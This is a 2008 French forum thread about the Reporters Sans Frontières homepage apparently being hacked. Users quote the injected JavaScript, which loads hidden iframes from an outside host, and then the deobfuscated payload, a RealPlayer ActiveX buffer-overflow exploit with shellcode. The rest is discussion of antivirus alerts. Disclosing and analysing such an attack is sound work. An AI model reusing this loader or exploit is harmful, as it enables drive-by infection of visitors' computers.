> Le Site du Zéro > Les forums > Communauté des zéros > Discussions générales > Reporter Sans Frontière Hacké ? > Lecture du sujet

Reporter Sans Frontière Hacké ?

BitDefender se déclenche sur la page d'accueil de RSF

Pour accéder à cette section
Connectez-vous !

Résolu Le problème de ce sujet a été résolu

Page Précédente 1 2 3 4 5 6 7 Suivante

Auteur

Message

1 visiteur sur ce sujet (1 Anonyme)

Page Précédente 1 2 3 4 5 6 7 Suivante

Bilbax

# Posté le 21/04/2008 à 14:16:37

www.bilbax.eu
Avatar

Ville : Saint-pierre
Pays : Saint-Pierre-et-Miquelon

Reprise du dernier message de la page précédente :

Regardez ce code louche trouvé à la fin du fichier pour hasher en md5 :

Code : JavaScript

//alert(document.cookie);
var expdate = new Date((new Date()).getTime() + (1*60*60*1000)); 
var expdates = new Date((new Date()).getTime() + (2*60*60*1000));
var expdatess = new Date((new Date()).getTime() + (3*60*60*1000));
if (document.cookie.indexOf( "onecookie")==-1&&document.cookie.indexOf( "twocookie")==-1&&document.cookie.indexOf( "threecookie")==-1) 
{
	document.write('<img src=http://amrc.com.tw/1/2.jpg width=0 height=0></iframe>');
	document.write('<img src=http://amrc.com.tw/1/22.html width=0 height=0></iframe>');
	document.cookie= "onecookie=1;expires= " + expdate.toGMTString() + ";path=/; ";
	document.cookie= "twocookie=1;expires= " + expdates.toGMTString() + ";path=/; ";
}
else if (getCookie("twocookie")==1&&document.cookie.indexOf( "onecookie")==-1&&document.cookie.indexOf( "threecookie")==-1)
{
	document.write('<iframe src=http://amrc.com.tw/1/2.htm width=0 height=0></iframe>');
	document.cookie= "threecookie=1;expires= " + expdatess.toGMTString() + ";path=/; ";}
else if (getCookie("threecookie")==1&&document.cookie.indexOf( "onecookie")==-1&&document.cookie.indexOf( "twocookie")==-1)
{
document.write('<iframe src=http://amrc.com.tw/1/2.html width=0 height=0></iframe>');
document.cookie= "threecookie=2;expires= " + expdatess.toGMTString() + ";path=/; ";
}
else
{
document.write("");
}

Ce n'est pas sa place, il a été rajouté ! o_O

EDIT : Ca mène vers une page 22.html qui elle contient un code JS "crypté", dont on ne peut pas voir la source, par contre FireBug a réussi à le voir :

Secret (cliquez pour afficher)

Code : JavaScript

function RealExploit()
{
	var user = navigator.userAgent.toLowerCase();
	
	if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
		return;
	if(user.indexOf("nt 5.")==-1)
		return;
	
	VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
	
	try
	{
		Real = new ActiveXObject(VulObject);
	}
	catch(error)
	{
		return;
	}
	
	RealVersion = Real.PlayerProperty("PRODUCTVERSION");
	Padding = "";
	JmpOver = unescape("%75%06%74%04");
	for(i = 0; i < 32 * 148; i++)
		Padding += "S";

	if(RealVersion.indexOf("6.0.14.") == -1)
	{
		if(navigator.userLanguage.toLowerCase() == "zh-cn")
			ret = unescape("%7f%a5%60");
		else if(navigator.userLanguage.toLowerCase() == "en-us")
			ret = unescape("%4f%71%a4%60");
		else
			return;
	}
	else if(RealVersion == "6.0.14.544")
		ret = unescape("%63%11%08%60");
	else if(RealVersion == "6.0.14.550")
		ret = unescape("%63%11%04%60");
	else if(RealVersion == "6.0.14.552")
		ret = unescape("%79%31%01%60");
	else if(RealVersion == "6.0.14.543")
		ret = unescape("%79%31%09%60");
	else if(RealVersion == "6.0.14.536")
		ret = unescape("%51%11%70%63");
	else
		return;


	if(RealVersion.indexOf("6.0.10.") != -1)
	{
		for(i = 0; i < 4; i++)
			Padding = Padding + JmpOver;
		Padding = Padding + ret;
	}
	else if(RealVersion.indexOf("6.0.11.") != -1)
	{
		for(i = 0; i < 6; i++)
			Padding = Padding + JmpOver;
		Padding = Padding + ret;
	}
	else if(RealVersion.indexOf("6.0.12.") != -1)
	{
		for(i = 0; i < 9; i++)
			Padding = Padding + JmpOver;
		Padding = Padding + ret;
	}
	else if(RealVersion.indexOf("6.0.14.") != -1)
	{
		for(i = 0; i < 10; i++)
			Padding = Padding + JmpOver;
		Padding = Padding + ret;
	}

	AdjESP = "LLLL\\XXXXXLD";
	Shell = "TYXXXXfiAqcYfPAAeiAoHFXZPiAkjbrIPiAgVbaaPiAckwzOPLiAsloUWPiAZczabPiAVqKpAPiARCpDXPQlaaTbaaaLtUAAAACFiaaPoHHmDahivabowabHknEwPCmfhwdgTwPcJrOBoFafMgrFsrnFSfoVmRnWtWGrOcarOSRrNFGfIffppppPpPpNBoYfXfofNPPPpFhGEgBvLFmetOoafXKNxnhBnPpPpPPHCnLRPXKmlVJrpucoOefPDlgptpSUlVqRNVeLGddpcPDGxfuppPPCslPepuPeCEWEpOOUfQphkMLupESOouVpXOoUFplEQuFhkGECLXkwTRnwxpsOEefHKgVRpPSOecClydYdqzMPsleCsMkpokNQpCJMfgtPxLALKpMPcmZTPNKoqcKaOGeNWENXkUNBTPCMmfVXKPLdKxkuNqLPSmMXkPDhKPclejKEneyLsNXEGOOOOOohnTNPnNLlaWiNuKxYHonXZpNgnMhnRgscVQjbOgpFxWdwTgPSjrOBOfAVmgrvSrNvCVOvMRNWtGgboCArOSabnvWvIFvPp";
	PayLoad = Padding + AdjESP + Shell;
	while(PayLoad.length < 0x8000)
		PayLoad += "YuanGe";
	Real.Import("c:\\Program Files\\NetMeeting\\blip.wav", PayLoad,"", 0, 0);
}
RealExploit();

Édité le 21/04/2008 à 14:25:43 par Bilbax

bomb attack new-york september 2011 pentagon fire irak nuclear al quaida ben laden terrorism kill obama kill bush world trade center fake death usa atomic bomb urss sarin allah ebola genocide boeing arbus crash hijacking explosion poison swin flu foot ball nuclear codes theft empire state building statue of liberty destruction gouvernment plot mafia 2012 mohamed

neirda33

# Posté le 21/04/2008 à 14:19:25

mmmmm...

je vous préviens si j'ai une réponse de RSF
[j'ai oublié le "s" à "frontièreS" au sujet du topic ^^]

OnrealiZ.com | Expressions-Ringardes.com Image utilisateur

1337833K

# Posté le 21/04/2008 à 14:20:03

lock cmpxchg8b eax

Un classique, l'injection d'iframe à virus dynamique ...

Top 3 des meilleures vidéos de tous les temps:

anonyme

# Posté le 21/04/2008 à 14:22:52

Ca marche sous Firefox ça ?

neirda33

# Posté le 21/04/2008 à 14:23:20

Citation : 1337833K

Un classique, l'injection d'iframe à virus dynamique ...

Ca fait trop penser aux médecins dans les films qui énumèrent une série d'ordres incompréhensibles par le grand public

OnrealiZ.com | Expressions-Ringardes.com Image utilisateur

Halfdream

# Posté le 21/04/2008 à 14:24:17

What about drugs ?
Avatar

Kaspersky ne dit rien et pourtant il aime souvent sortir son cri de cochon égorgé.
Soit c'est les chinois (qui manifestent contre Carouf' HAHAHAH, HAHA,HA) c'est probable ou alors c'est vous qui êtes déjà virusé.
Bizarre quand même.

| Lolcats§ |musikCube, best player ever § | Jean-Marie !

vodkanux

# Posté le 21/04/2008 à 14:27:31

études : BTS IRIS

Sam'étonnerais que il est autant d'infecter , une personne je comprend mais la ya déjà plusieurs zéros qui ont été avertis par leur antivirus je me trompe ?

Bref on attend on verra ce que se passe.

Perso Avast ne répère rien.

Faites du bien a vos orreilles

et mon Blog !

azymut

# Posté le 21/04/2008 à 14:40:46

anciennement potaitoz

De 1 je pense que sa touche que windows ( tiré du code : Real.Import("c:\\Program Files\\NetMeeting\\blip.wav", PayLoad,"", 0, 0);)

De plus je pense que sa touche une faille du real player (pour rentrer le virus, pas le virus lui meme)
(code js: RealVersion = Real.PlayerProperty("PRODUCTVERSION");)

Pas de trace de firefox dans la source car utilisation d'objet ActiveX :

Code : JavaScript

var user = navigator.userAgent.toLowerCase();
if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
		return;
	if(user.indexOf("nt 5.")==-1)
		return;
	
	VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
	
	try
	{
		Real = new ActiveXObject(VulObject);
	}
	catch(error)
	{
		return;
	}

Halfdream

# Posté le 21/04/2008 à 14:46:27

What about drugs ?
Avatar

Pas d'infection avec Firefox alors ?

| Lolcats§ |musikCube, best player ever § | Jean-Marie !

azymut

# Posté le 21/04/2008 à 15:18:15

anciennement potaitoz

Citation : Halfdream

Pas d'infection avec Firefox alors ?

Je suis pas spécialiste en sécurité mais vu le nom de variable, fonction etc... rien ne porte a croire que sa marche sur firefox (la liste de navigateur ne parle que de msie soit notre chere Internet Explorer :-°

et de Nt, netscape ?)

ps: Shell en fin de script pour faire rentrer le virus.

pps: super la sauvegarde automatique des textes, très pratique maintenant après la maintenance.

neirda33

# Posté le 21/04/2008 à 15:21:18

Hum... Les zérOs sont sur le pied de guerre !
Pensez-vous que je dois contacter RSF par téléphone pour les prévenir ?

OnrealiZ.com | Expressions-Ringardes.com Image utilisateur

anonyme

# Posté le 21/04/2008 à 15:24:28

Ouais remarque ça serait pas mal.

Halfdream

# Posté le 21/04/2008 à 15:25:20

What about drugs ?
Avatar

neirda > Pourquoi pas après tout. Prévois un petit dossier histoire que tu sois pris au sérieux avec même peut être le lien du topic ?

| Lolcats§ |musikCube, best player ever § | Jean-Marie !

jolo2

# Posté le 21/04/2008 à 15:36:02

Je suis moi.
Avatar

sa me fait une alerte avec OneCare et apres je me demande pourquoi les aưter antivirus le detecte pas

--> irc://irc.epiknet.org/#jolo2 <-- Mon chan de tests | Faites chanter votre PC ! | La majuscule a mon pseudo est une faute (grave :D) | Un bon jeu

ratdecav

# Posté le 21/04/2008 à 15:39:03

Citation : clems942

Je suis allé là : http://......jpg
Et rien de particulier. Mais c'est vrai que c'est bizarre.

clems, il faut que tu préviennes que ce lien n' est pas une image

.
(les moins avertis n' ont peut être pas tout compris).
Ceux qui ont cliqué desuus et qui ont un antivirus un peu faiblard peuvent avoir installé un trojan.

Édité le 21/04/2008 à 15:39:41 par ratdecav

anonyme

# Posté le 21/04/2008 à 15:42:03

Edité, faudrait que les autres le fassent aussi. Effectivement c'est pas très prudent (moi jsuis un H4X0R donc jpeux y aller, mais les N0085 doivent se méfier).
(joke)

Xinox

# Posté le 21/04/2008 à 15:58:46

Ça y est, mon ordi est infecté par je ne sais quoi, on m'indique un problème de Runtime error. J'ai installé Windows il y a deux jours, et j'ai Avast. Je sais pas si c'est en rapport mais ça ne m'étonnerait pas trop.

anonyme

# Posté le 21/04/2008 à 16:05:16

Moi j'ai rien alors que j'ai exécuté le script.
Firefox (Gecko/20080404 Firefox/2.0.0.14) - Windows Vista - Avast

dimdam

# Posté le 21/04/2008 à 16:07:06

Antivir vient de me trouver un virus :euh:

anonyme

# Posté le 21/04/2008 à 16:07:59

Bah les gars faut prendre ses responsabilités avant de cliquer hein

Xinox

# Posté le 21/04/2008 à 16:16:16

Je vais foutre un scan Avast au démarrage, mais ça m'étonnerait qu'il réagisse.

vodkanux

# Posté le 21/04/2008 à 16:31:07

études : BTS IRIS

Moi perso aucun signe d'infection , j'ai Avast et Firefox 2.0 avec Windows Vista SP1

Faites du bien a vos orreilles

et mon Blog !

jolo2

# Posté le 21/04/2008 à 16:31:58

Je suis moi.
Avatar

bah t'est infecter si ya aucun signe d'infection

(car l'antivirus ne l'as pas detecter on dirait)

Édité le 21/04/2008 à 16:33:13 par jolo2

--> irc://irc.epiknet.org/#jolo2 <-- Mon chan de tests | Faites chanter votre PC ! | La majuscule a mon pseudo est une faute (grave :D) | Un bon jeu

vodkanux

# Posté le 21/04/2008 à 16:37:17

études : BTS IRIS

Ouai faut que je fasse un scan avec un autre antivirus.

On a des nouvelles si RSF a fait quelquechose pour suprimmer le virus?

Faites du bien a vos orreilles

et mon Blog !

nonbannis

# Posté le 21/04/2008 à 16:45:51

Commencent à casser les couilles ces chinois.

Z3 n00b

vodkanux

# Posté le 21/04/2008 à 17:06:19

études : BTS IRIS

Eh bien celui qui a fait sa n'est pas c.., il est plutôt intelligent, mais certes sa reste un acte illégal qui doit être punis !

Faites du bien a vos orreilles

et mon Blog !

1337833K

# Posté le 21/04/2008 à 17:08:06

lock cmpxchg8b eax

Citation : vodkanux

Eh bien celui qui a fait sa n'est pas c.., il est plutôt intelligent, mais certes sa reste un acte illégal qui doit être punis !

Beh, c'est un "simple" shellcode contre GDI32.dll/RealPlayer. Certes, c'est pas facile à faire, mais c'est pas un génie non plus ... (si ça se trouve, c'est un lamer)

Top 3 des meilleures vidéos de tous les temps:

nonbannis

# Posté le 21/04/2008 à 17:11:07

T'as l'air d'avoir une excellente maitrise du sujet (le document technique sur le rootkit placé dans la MBR est trop top).

Édité le 21/04/2008 à 17:13:26 par nonbannis

Z3 n00b

vodkanux

# Posté le 21/04/2008 à 17:14:15

études : BTS IRIS

Ouai je vois pas un lamerz faire sa, perso moi un lamerz va pas plus loin que Trojan/Nuker et autres programme qui servent a rien

Ce servir de metasploit j'aimerais bien voir sa...

Quoique ta peutetre raison lol

Faites du bien a vos orreilles

et mon Blog !

1337833K

# Posté le 21/04/2008 à 17:20:17

lock cmpxchg8b eax

Citation : nonbannis

T'as l'air d'avoir une excellente maitrise du sujet (le document technique sur le rootkit placé dans la MBR est trop top).

Mouais, en théorie je m'y connais pas mal. Mais en pratique, je n'ai jamais réussi à faire un seul exploit. (je sais, je devrais avoir honte :honte:

)

Édité le 21/04/2008 à 17:21:35 par 1337833K

Top 3 des meilleures vidéos de tous les temps:

kumae

# Posté le 21/04/2008 à 17:21:40

Tales of powa !

Ca m'étonnerait que les lamers fassent ca, ils le font qu'entre eux nan ?
En tout cas, le mec qu'a fait ca est plutot humble, la plupart des crackers cherchent à afficher leur blaze à la place de l'image ou autre, lui il y a que du code

Powa Sonic XNA 2 (en cours de programmation)
Etat du jeu:

Codage du moteur de jeu:
|||||||||||||||||||| (il manque les rotations et les loopings =P)
Scénario du jeu:
||||||||||||||||||||
Graphismes (création des décors et animation du perso):
||||||||||||||||||||
Musiques (Jun Senoue c'est le meilleur xD) et sons (bruitages):
||||||||||||||||||||

Retour au forum "Discussions générales" ou à la liste des forums

Pour accéder à cette section
Connectez-vous !

Livre du Zéro

Cours

Reporter Sans Frontière Hacké ?

BitDefender se déclenche sur la page d'accueil de RSF